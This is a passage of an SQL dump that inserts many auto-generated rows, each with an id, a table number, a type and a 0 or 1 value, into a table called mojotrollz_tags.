1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1784, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1785, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1786, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1787, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1788, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1789, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1790, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1791, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1792, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1793, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1794, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1795, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1796, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1797, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1798, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1799, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1801, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1802, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1803, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1804, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1805, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1806, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1807, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1808, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1809, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1810, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1811, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1812, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1813, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1814, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1815, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1816, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1817, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1818, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1819, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1820, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1821, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1822, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1824, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1825, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1826, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1827, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1828, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1829, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1830, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1831, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1832, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1833, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1834, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1835, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1836, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1837, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1838, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1839, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1840, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1841, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1842, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1843, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1844, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1845, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1846, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1847, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1848, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1849, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1850, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1851, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1852, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1853, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1854, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1855, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1856, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1857, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1858, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1859, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1860, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1864, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1865, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1866, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1867, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1868, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1869, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1870, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1871, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1872, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1873, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1874, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1875, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1876, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1877, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1878, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1879, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1880, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1881, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1882, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1883, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1884, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1885, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1886, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1887, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1888, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1889, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1890, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1891, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1892, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1893, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1894, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1895, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1896, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1897, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1898, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1901, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1902, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1903, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1904, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1905, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1906, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1908, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1909, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1911, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1912, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1914, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1915, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1916, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1917, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1922, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1923, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1926, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1928, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1930, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1931, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1932, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1936, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1937, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1938, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1939, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1940, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1941, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1943, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1944, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1945, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1946, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1947, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1948, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1949, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1950, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1951, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1952, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1953, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1954, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1957, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1958, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1959, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1960, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1961, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1962, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1964, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1967, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1969, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1970, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1971, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1972, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1973, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1975, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1976, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1977, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1979, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1981, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1984, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1985, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1986, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1987, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1988, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1989, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1990, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1991, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1992, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1993, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1994, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1995, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1996, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1997, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1998, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1999, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2000, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2001, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2002, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2003, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2004, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2005, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2006, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2007, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2008, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2010, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2014, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2015, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2016, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2017, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2018, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2019, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2020, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2021, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2022, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2023, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2024, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2025, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2026, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2027, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2028, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2029, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2030, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2031, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2032, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2033, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2034, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2035, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2036, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2037, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2038, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2039, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2040, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2041, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2042, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2043, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2044, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2045, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2046, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2047, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2048, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2049, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2050, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2051, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2052, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2054, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2055, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2056, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2057, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2059, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2061, 2, 1, 0, 